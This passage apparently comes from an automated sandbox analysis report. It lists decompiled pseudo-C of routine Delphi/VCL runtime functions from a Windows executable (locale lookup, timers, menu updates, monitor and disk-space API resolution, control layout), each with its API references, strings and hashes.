    return E00404760( &_v28, 4);
}


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000000,0040BB1B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040BA24
                                                                            Strings
                                                                            • ,w@ , xrefs: 0040BA42
                                                                            • $x@ , xrefs: 0040BAD6
                                                                            • w@ , xrefs: 0040BAB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: LocaleThread
                                                                            • String ID: $x@$,w@$w@
                                                                            • API String ID: 635194068-3772529897
                                                                            • Opcode ID: 190d255e8ff991ed6adefd9f30e002100e668f39c50ea463852dc53f0779f4e0
                                                                            • Instruction ID: ff42a5d57a33c53001075c18811d422212253fa3653e9f98a0f8edc246bfd2b8
                                                                            • Opcode Fuzzy Hash: 190d255e8ff991ed6adefd9f30e002100e668f39c50ea463852dc53f0779f4e0
                                                                            • Instruction Fuzzy Hash: E33178B1F005085BD704EA95D881BAF77A9DBC8314F65443BFA09E7381D73DAD0186AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 73%
E004577C4(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
    int _v8;
    char _v9;
    char _v16;
    char _v20;
    intOrPtr _t39;
    long _t44;
    int _t59;
    void* _t70;
    intOrPtr _t74;
    intOrPtr* _t75;
    intOrPtr _t76;
    void* _t82;
    void* _t83;
    intOrPtr _t84;

    _t80 = __esi;
    _t79 = __edi;
    _t70 = __edx;
    _t82 = _t83;
    _t84 = _t83 + 0xfffffff0;
    _push(__ebx);
    _push(__esi);
    _push(__edi);
    _v16 = 0;
    _v20 = 0;
    _v8 = __eax;
    _push(_t82);
    _push(0x457911);
    _push( *[fs:eax]);
    *[fs:eax] = _t84;
    _t63 = E00457738(_v8);
    if( *((char*)(_v8 + 0x88)) != 0) {
        _t59 = _v8;
        _t86 = *((intOrPtr*)(_t59 + 0x48));
        if( *((intOrPtr*)(_t59 + 0x48)) == 0) {
            L00457D90(_v8, 0, _t70);
        }
    }
    E00455250(_t63, &_v20);
    E00437730(_v20, 0, &_v16, _t86);
    _t39 = *0x466580; // 0x26df470
    E004579C0(_t39, _v16, _t86);
    _v9 = 1;
    _push(_t82);
    _push(0x4578b8);
    _push( *[fs:eax]);
    *[fs:eax] = _t84;
    if( *((short*)(_v8 + 0x12a)) != 0) {
        _t63 = _v8;
        *((intOrPtr*)(_v8 + 0x128))();
    }
    if(_v9 != 0) {
        _t24 = _v8 + 0xc0; // 0xbea6e800
        _t63 = *_t24;
        if(_t63 > 0) {
            __eflags = *0x4665a0;
            if( *0x4665a0 == 0) {
                *0x4665a0 = SetTimer(0, 0, _t63, E0045775C);
                __eflags = *0x4665a0;
                if( *0x4665a0 == 0) {
                    E004576D4();
                }
            }
        } else {
            E004576D4();
        }
    }
    _pop(_t74);
    *[fs:eax] = _t74;
    _t44 = GetCurrentThreadId();
    _t75 = *0x462f38; // 0x463034
    if(_t44 == *_t75 && E0042048C(0, _t63, _t79, _t80) != 0) {
        _v9 = 0;
    }
    if(_v9 != 0) {
        WaitMessage();
    }
    _pop(_t76);
    *[fs:eax] = _t76;
    _push(E00457918);
    return E00404760( &_v20, 2);
}


                                                                            APIs
                                                                              • Part of subcall function 00457738: GetCursorPos.USER32 ref: 0045773F
                                                                            • SetTimer.USER32 ref: 00457893
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004578CD
                                                                            • WaitMessage.USER32(00000000,00457911,?,?,?,00460C02), ref: 004578F1
                                                                            Strings
                                                                            • 40F , xrefs: 004578D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CurrentCursorMessageThreadTimerWait
                                                                            • String ID: 40F
                                                                            • API String ID: 3909455694-2631550472
                                                                            • Opcode ID: 024d60afcb6fa436a8515f78470afffda0a18e1312202335da47132cbf8f2364
                                                                            • Instruction ID: e89649fe14110faf48328d87229489a930fd8d9713066124e3e3ff92809c3fcb
                                                                            • Opcode Fuzzy Hash: 024d60afcb6fa436a8515f78470afffda0a18e1312202335da47132cbf8f2364
                                                                            • Instruction Fuzzy Hash: 0E419330A08204AFDB11EBA4E886B9E77F5EF04315F6144BAEC0097393D7786E48CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
E0043394C(intOrPtr* __eax) {
    struct tagMENUITEMINFOA _v128;
    intOrPtr _v132;
    int _t16;
    intOrPtr* _t29;
    struct HMENU__* _t36;
    MENUITEMINFOA* _t37;

    _t37 = &_v128;
    _t29 = __eax;
    _t16 = *0x462f3c; // 0x4658c8
    if( *((char*)(_t16 + 0xd)) != 0 && *((intOrPtr*)(__eax + 0x38)) != 0) {
        _t36 = *((intOrPtr*)( *__eax + 0x34))();
        _t37->cbSize = 0x2c;
        _v132 = 0x10;
        _v128.hbmpUnchecked = &(_v128.cch);
        _v128.dwItemData = 0x50;
        _t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
        if(_t16 != 0) {
            _t16 = E00433CE0(_t29);
            asm("sbb edx, edx");
            if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                _v128.cbSize = ((E00433CE0(_t29) & 0x0000007f) << 0x0000000d) + ((E00433CE0(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                _v132 = 0x10;
                _t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                if(_t16 != 0) {
                    return DrawMenuBar( *(_t29 + 0x38));
                }
            }
        }
    }
    return _t16;
}


                                                                            APIs
                                                                            • GetMenuItemInfoA.USER32 ref: 0043399A
                                                                            • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 004339EC
                                                                            • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 004339F9
                                                                            Strings
                                                                            • P , xrefs: 0043398C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$InfoItem$Draw
                                                                            • String ID: P
                                                                            • API String ID: 3227129158-3110715001
                                                                            • Opcode ID: fa58c7a9b2e32d2e266c9545e896ff45175c2863883d5026e0fe250c8b0133d9
                                                                            • Instruction ID: 1a0cb4ff114c7cd32e92c9fa77bceba14735dfb38598f85aa0acc494823d54c1
                                                                            • Opcode Fuzzy Hash: fa58c7a9b2e32d2e266c9545e896ff45175c2863883d5026e0fe250c8b0133d9
                                                                            • Instruction Fuzzy Hash: EF11C470605210AFD310DF29CC85B4B76D4AF88366F149669F094D73E9D77DC984C78A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                                                                                  E00422F78(intOrPtr _a4, intOrPtr _a8, signed int _a12) { 				void* __ebx; 				void* __edi; 				void* __esi; 				void* __ebp; 				void* _t15; 				void* _t16; 				intOrPtr _t18; 				signed int _t19; 				void* _t20; 				intOrPtr _t21;  				_t19 = _a12; 				if( *0x46633b != 0) { 					_t16 = 0; 					if((_t19 & 0x00000003) != 0) { 						L7: 						_t16 = 0x12340042; 					} else { 						_t21 = _a4; 						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) { 							goto L7; 						} 					} 				} else { 					_t18 =  *0x46631c; // 0x422f78 					 *0x46631c = E00422CE4(3, _t15, _t18, _t19, _t20); 					_t16 =  *0x46631c(_a4, _a8, _t19); 				} 				return _t16; 			}                        

                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 00422FC6
                                                                            • GetSystemMetrics.USER32 ref: 00422FD8
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • x/B , xrefs: 00422F8F, 00422F9C, 00422FA8
                                                                            • MonitorFromPoint , xrefs: 00422F8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$AddressProc
                                                                            • String ID: MonitorFromPoint$x/B
                                                                            • API String ID: 1792783759-3362865607
                                                                            • Opcode ID: 44c87fef4cfb7df56709ba947901e1d111c4d3eb60895fa92bde7c443fd75764
                                                                            • Instruction ID: 8c996490f865ef833d6f29e33133d28ea07156a354397cb3f82660790c2b9ebf
                                                                            • Opcode Fuzzy Hash: 44c87fef4cfb7df56709ba947901e1d111c4d3eb60895fa92bde7c443fd75764
                                                                            • Instruction Fuzzy Hash: 5D01DF313001247BDB009F05EE44B5ABB60E710314FC28037FC049A3A0D3F98C81EBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                                                                                  E00422E50(intOrPtr* _a4, signed int _a8) { 				void* __ebx; 				void* __edi; 				void* __esi; 				void* __ebp; 				intOrPtr* _t14; 				intOrPtr _t16; 				signed int _t17; 				void* _t18; 				void* _t19;  				_t17 = _a8; 				_t14 = _a4; 				if( *0x46633a != 0) { 					_t19 = 0; 					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) { 						_t19 = 0x12340042; 					} 				} else { 					_t16 =  *0x466318; // 0x422e50 					 *0x466318 = E00422CE4(2, _t14, _t16, _t17, _t18); 					_t19 =  *0x466318(_t14, _t17); 				} 				return _t19; 			}                        

                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 00422EA1
                                                                            • GetSystemMetrics.USER32 ref: 00422EAD
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • P.B , xrefs: 00422E6A, 00422E77, 00422E7E
                                                                            • MonitorFromRect , xrefs: 00422E65
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$AddressProc
                                                                            • String ID: MonitorFromRect$P.B
                                                                            • API String ID: 1792783759-2213800761
                                                                            • Opcode ID: d1312910f7091c19559ba0fe7ce2875f1198a4a289036ac6f49b1dab6c252c78
                                                                            • Instruction ID: 344e9d6dab49e3fdbc3704bf19803c74fdffa6d0553f2af2d0679323b2ac8f6f
                                                                            • Opcode Fuzzy Hash: d1312910f7091c19559ba0fe7ce2875f1198a4a289036ac6f49b1dab6c252c78
                                                                            • Instruction Fuzzy Hash: 37018B32700224BBDB208B04EA85B1AB758F740724F868462FC04CA342C3F89C80DBFA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E0040D85C() { 				_Unknown_base(*)()* _t1; 				struct HINSTANCE__* _t3;  				_t1 = GetModuleHandleA("kernel32.dll"); 				_t3 = _t1; 				if(_t3 != 0) { 					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA"); 					 *0x46182c = _t1; 				} 				if( *0x46182c == 0) { 					 *0x46182c = E00408F94; 					return E00408F94; 				} 				return _t1; 			}                        

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0046010B,00000000,0046011E), ref: 0040D862
                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040D873
                                                                            Strings
                                                                            • GetDiskFreeSpaceExA , xrefs: 0040D86D
                                                                            • kernel32.dll , xrefs: 0040D85D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                            • API String ID: 1646373207-3712701948
                                                                            • Opcode ID: 2e2f4f89079191d4818a05b952f3a92a1b3673e8b5a347ee851826118ffcadc1
                                                                            • Instruction ID: f92f8e55d4f3d77ad231ec8b499964c1603e405444d36c9258ecd07ec0a69fbb
                                                                            • Opcode Fuzzy Hash: 2e2f4f89079191d4818a05b952f3a92a1b3673e8b5a347ee851826118ffcadc1
                                                                            • Instruction Fuzzy Hash: 30D09EE6A003519EEB11BBF65881A2636D49B14308B18843BE151B62E2E7FDC818CF9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                                                                                  E0043D9E0(signed int __eax, int* __ecx, void* __edx, char _a4, intOrPtr* _a8, void* _a12, signed int _a16) { 				signed int _v8; 				signed int _v12; 				signed int _v16; 				signed int _v20; 				signed int _v24; 				char _v40; 				signed int _t170; 				signed int _t181; 				void* _t194; 				void* _t198; 				int _t218; 				int _t223; 				int _t228; 				signed int _t229; 				void* _t237; 				signed int _t238; 				int* _t244; 				signed int _t274; 				signed int _t276; 				signed int _t278; 				void* _t284; 				intOrPtr* _t290; 				void* _t292; 				void* _t302; 				void* _t304;  				_t170 = __eax; 				asm("movsd"); 				asm("movsd"); 				asm("movsd"); 				asm("movsd"); 				_t244 = __ecx; 				_t292 = __edx; 				_v8 = __eax; 				_t290 = _a8; 				if(_a16 == 0) { 					L2: 					if( *(_t292 + 0x175) == 0 ||  *(_t292 + 0x179) == 0) { 						L30: 						if(_a16 == 0) { 							L55: 							return _t170; 						} 						L31: 						_v20 =  *((intOrPtr*)(_t290 + 8)) -  *_t290; 						if(_v20 < 0) { 							L34: 							_v20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 							L35: 							_v24 =  *((intOrPtr*)(_t290 + 0xc)) -  *((intOrPtr*)(_t290 + 4)); 							if(_v24 < 0) { 								L38: 								_v24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 								L39: 								_v12 =  *_t290; 								_v16 =  *((intOrPtr*)(_t290 + 4)); 								_t181 = _a16 & 0x000000ff; 								if(_t181 > 6) { 									L46: 									E00447BB8( *((intOrPtr*)(_t292 + 0x78)), _v12, 1, _v24, _v20); 									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))() != _v20) { 										L48: 										_t170 = _a16 & 0x000000ff; 										if(_t170 > 5) { 											goto L55; 										} 										switch( *((intOrPtr*)(_t170 * 4 +  &M0043DD0B))) { 											case 0: 												goto L55; 											case 1: 												
_t189 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 												 *((intOrPtr*)(_t290 + 4)) =  *((intOrPtr*)(_t290 + 4)) - _v24 - _t189; 												return _t189; 											case 2: 												__edx = 3; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v24 = _v24 - __eax; 												 *(__edi + 0xc) =  *(__edi + 0xc) + _v24 - __eax; 												return __eax; 											case 3: 												__edx = 2; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v20 = _v20 - __eax; 												 *__edi =  *__edi - _v20 - __eax; 												return __eax; 											case 4: 												__edx = 2; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v20 = _v20 - __eax; 												 *(__edi + 8) =  *(__edi + 8) + _v20 - __eax; 												return __eax; 											case 5: 												__edx = 2; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v20 = _v20 - __eax; 												 *(__edi + 8) =  *(__edi + 8) + _v20 - __eax; 												__edx = 3; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v24 = _v24 - __eax; 												_t168 = __edi + 0xc; 												 *_t168 =  *(__edi + 0xc) + _v24 - __eax; 												__eflags =  *_t168; 												return __eax; 										} 									} 									_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 									if(_t170 == _v24) { 										goto L55; 									} 									goto L48; 								} 								switch( *((intOrPtr*)(_t181 * 4 +  &M0043DC43))) { 			
						case 0: 										goto L46; 									case 1: 										 *((intOrPtr*)(_t290 + 4)) =  *((intOrPtr*)(_t290 + 4)) + _v24; 										goto L46; 									case 2: 										__eax = _v24; 										 *(__edi + 0xc) =  *(__edi + 0xc) - _v24; 										__eax =  *(__edi + 0xc); 										_v16 = __eax; 										goto L46; 									case 3: 										__eax = _v20; 										 *__edi =  *__edi + __eax; 										goto L46; 									case 4: 										__eax = _v20; 										 *(__edi + 8) =  *(__edi + 8) - _v20; 										__eax =  *(__edi + 8); 										_v12 = __eax; 										goto L46; 									case 5: 										__eax =  *(__esi + 0x40); 										_v12 =  *(__esi + 0x40); 										__eax =  *(__esi + 0x44); 										_v16 =  *(__esi + 0x44); 										__eax =  &_v16; 										_push( &_v16); 										__eax =  &_v20; 										_push( &_v20); 										__eax =  &_v24; 										_push( &_v24); 										_push(__edi); 										__eax =  &_v40; 										_push( &_v40); 										__ecx =  &_v12; 										__edx = __esi; 										__eax = _v8; 										__eax =  *((intOrPtr*)( *_v8 + 0xac))(); 										goto L46; 								} 							} 							_t194 = (_a16 & 0x000000ff) - 0xffffffffffffffff; 							if(_t194 < 0 || _t194 == 3) { 								goto L38; 							} else { 								goto L39; 							} 						} 						_t198 = (_a16 & 0x000000ff) + 0xfd - 2; 						if(_t198 < 0 || _t198 == 1) { 							goto L34; 						} else { 							goto L35; 						} 					} else { 						_v12 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 						_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 						_v20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 						_v24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 						if(( *(_t292 + 0x61) & 0x00000004) == 0) { 							__eflags =  *(_t292 + 0x61) & 0x00000001; 							if(__eflags == 0) { 								_t238 = _t237 - _t284; 								__eflags = _t238; 								_v12 = _t238; 
							} 						} else { 							if(( *(_t292 + 0x61) & 0x00000001) == 0) { 								_v12 =  *_t244 -  *(_t292 + 0x175) -  *((intOrPtr*)(_t292 + 0x165)); 							} else { 								_v20 =  *_t244 -  *(_t292 + 0x175) -  *((intOrPtr*)(_t292 + 0x165)); 							} 						} 						if(( *(_t292 + 0x61) & 0x00000008) == 0) { 							__eflags =  *(_t292 + 0x61) & 0x00000002; 							if(__eflags == 0) { 								_t228 = MulDiv( *(_t292 + 0x169), _t244[1],  *(_t292 + 0x179)); 								_t278 = _v24 >> 1; 								if(__eflags < 0) { 									asm("adc edx, 0x0"); 								} 								_t229 = _t228 - _t278; 								__eflags = _t229; 								_v16 = _t229; 							} 						} else { 							if(( *(_t292 + 0x61) & 0x00000002) == 0) { 								_v16 = _t244[1] -  *(_t292 + 0x179) -  *(_t292 + 0x169); 							} else { 								_v24 = _t244[1] -  *(_t292 + 0x179) -  *(_t292 + 0x169); 							} 						} 						if(_a4 != 0) { 							_t302 = ( *0x43ddb8 & 0x000000ff) - ( *0x43ddb4 & 0x000000ff &  *(_t292 + 0x61)); 							if(_t302 != 0) { 								_t223 = MulDiv( *(_t292 + 0x16d),  *_t244,  *(_t292 + 0x175)); 								_t276 = _v20 >> 1; 								if(_t302 < 0) { 									asm("adc edx, 0x0"); 								} 								_v12 = _t223 - _t276; 							} 							_t304 = ( *0x43ddb8 & 0x000000ff) - ( *0x43ddbc & 0x000000ff &  *(_t292 + 0x61)); 							if(_t304 != 0) { 								_t218 = MulDiv( *(_t292 + 0x171), _t244[1],  *(_t292 + 0x179)); 								_t274 = _v24 >> 1; 								if(_t304 < 0) { 									asm("adc edx, 0x0"); 								} 								_v16 = _t218 - _t274; 							} 						} 						_t170 = E00447BB8( *((intOrPtr*)(_t292 + 0x78)), _v12, 1, _v24, _v20); 						goto L30; 					} 				} 				_t7 = (_a16 & 0x000000ff) + 0x462568; // 0xb0d0703 				_t170 =  *_t7 & 0x000000ff; 				if(_t170 ==  *((intOrPtr*)(__edx + 0x61))) { 					goto L31; 				} 				goto L2; 			}                        

                                                                            0x0043dd9d
                                                                            0x0043dda3
                                                                            0x0043dda5
                                                                            0x0043dda5
                                                                            0x0043dda5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dd04
                                                                            0x0043dceb
                                                                            0x0043dcf1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dcf1
                                                                            0x0043dc3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dc62
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dc67
                                                                            0x0043dc6a
                                                                            0x0043dc6d
                                                                            0x0043dc70
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dc75
                                                                            0x0043dc78
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dc7c
                                                                            0x0043dc7f
                                                                            0x0043dc82
                                                                            0x0043dc85
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dc8a
                                                                            0x0043dc8d
                                                                            0x0043dc90
                                                                            0x0043dc93
                                                                            0x0043dc96
                                                                            0x0043dc99
                                                                            0x0043dc9a
                                                                            0x0043dc9d
                                                                            0x0043dc9e
                                                                            0x0043dca1
                                                                            0x0043dca2
                                                                            0x0043dca3
                                                                            0x0043dca6
                                                                            0x0043dca7
                                                                            0x0043dcaa
                                                                            0x0043dcac
                                                                            0x0043dcb1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dc3c
                                                                            0x0043dc10
                                                                            0x0043dc12
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043dc12
                                                                            0x0043dbe4
                                                                            0x0043dbe6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043da31
                                                                            0x0043da3b
                                                                            0x0043da4b
                                                                            0x0043da5b
                                                                            0x0043da6b
                                                                            0x0043da72
                                                                            0x0043daa4
                                                                            0x0043daa8
                                                                            0x0043daca
                                                                            0x0043daca
                                                                            0x0043dacc
                                                                            0x0043dacc
                                                                            0x0043da74
                                                                            0x0043da78
                                                                            0x0043da9f
                                                                            0x0043da7a
                                                                            0x0043da8a
                                                                            0x0043da8a
                                                                            0x0043da78
                                                                            0x0043dad3
                                                                            0x0043db07
                                                                            0x0043db0b
                                                                            0x0043db1f
                                                                            0x0043db27
                                                                            0x0043db29
                                                                            0x0043db2b
                                                                            0x0043db2b
                                                                            0x0043db2e
                                                                            0x0043db2e
                                                                            0x0043db30
                                                                            0x0043db30
                                                                            0x0043dad5
                                                                            0x0043dad9
                                                                            0x0043db02
                                                                            0x0043dadb
                                                                            0x0043daec
                                                                            0x0043daec
                                                                            0x0043dad9
                                                                            0x0043db37
                                                                            0x0043db4a
                                                                            0x0043db4c
                                                                            0x0043db5f
                                                                            0x0043db67
                                                                            0x0043db69
                                                                            0x0043db6b
                                                                            0x0043db6b
                                                                            0x0043db70
                                                                            0x0043db70
                                                                            0x0043db84
                                                                            0x0043db86
                                                                            0x0043db9a
                                                                            0x0043dba2
                                                                            0x0043dba4
                                                                            0x0043dba6
                                                                            0x0043dba6
                                                                            0x0043dbab
                                                                            0x0043dbab
                                                                            0x0043db86
                                                                            0x0043dbc1
                                                                            0x00000000
                                                                            0x0043dbc1
                                                                            0x0043da1e
                                                                            0x0043da07
                                                                            0x0043da07
                                                                            0x0043da11
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0043DB5F
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043DB9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac93a01106b9b8afdc737577d4b32e1d48ec0ca0db69446e1e7388fe02ce81ee
                                                                            • Instruction ID: 362d5403a1925025f21cd0c7a8b8993e4e77c4d1e46d8b923cef89c0b287574d
                                                                            • Opcode Fuzzy Hash: ac93a01106b9b8afdc737577d4b32e1d48ec0ca0db69446e1e7388fe02ce81ee
                                                                            • Instruction Fuzzy Hash: 89D16870A04A059FDB11CF69C484AAABBF6FF89300F24895AE856DB754C738FD41CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
E00438594(intOrPtr* __eax, signed int __edx) {
    intOrPtr _v16;
    char _v20;
    char _v24;
    char _v28;
    intOrPtr _t51;
    intOrPtr _t52;
    intOrPtr _t55;
    intOrPtr _t56;
    intOrPtr _t57;
    intOrPtr _t58;
    intOrPtr* _t62;
    intOrPtr* _t64;
    struct HICON__* _t67;
    intOrPtr _t69;
    intOrPtr* _t74;
    intOrPtr _t76;
    intOrPtr* _t77;
    intOrPtr* _t79;
    intOrPtr _t82;
    intOrPtr _t84;
    intOrPtr _t86;
    intOrPtr _t88;
    intOrPtr _t89;
    struct HWND__* _t92;
    intOrPtr _t93;
    intOrPtr _t95;
    intOrPtr _t96;
    intOrPtr* _t98;
    intOrPtr _t102;
    intOrPtr _t105;
    intOrPtr _t107;
    intOrPtr _t108;
    intOrPtr _t109;
    intOrPtr _t111;
    struct HWND__* _t112;
    intOrPtr _t113;
    intOrPtr _t115;
    intOrPtr _t119;
    intOrPtr* _t122;
    intOrPtr _t123;
    void* _t137;
    intOrPtr _t141;
    intOrPtr _t147;
    void* _t163;
    char _t164;
    intOrPtr _t166;
    void* _t173;
    void* _t174;

    _t122 = __eax;
    if( *0x466530 != 0) {
        L3:
        _t51 = *0x466510; // 0x0
        _t52 = *0x466510; // 0x0
        _t166 = E00438468(_t122, *(_t52 + 0x8f) & 0x000000ff, &_v28, _t51);
        if( *0x466530 == 0) {
            _t176 = *0x466534;
            if( *0x466534 != 0) {
                _t111 = *0x466524; // 0x0
                _t112 = GetDesktopWindow();
                _t113 = *0x466534; // 0x0
                L00443F74(_t113, _t112, _t176, _t111);
            }
        }
        _t55 = *0x466510; // 0x0
        if( *((char*)(_t55 + 0x8f)) != 0) {
            __eflags = *0x466530;
            _t6 = &_v24;
            *_t6 = *0x466530 != 0;
            __eflags = *_t6;
            *0x466530 = 2;
        } else {
            *0x466530 = 1;
            _v24 = 0;
        }
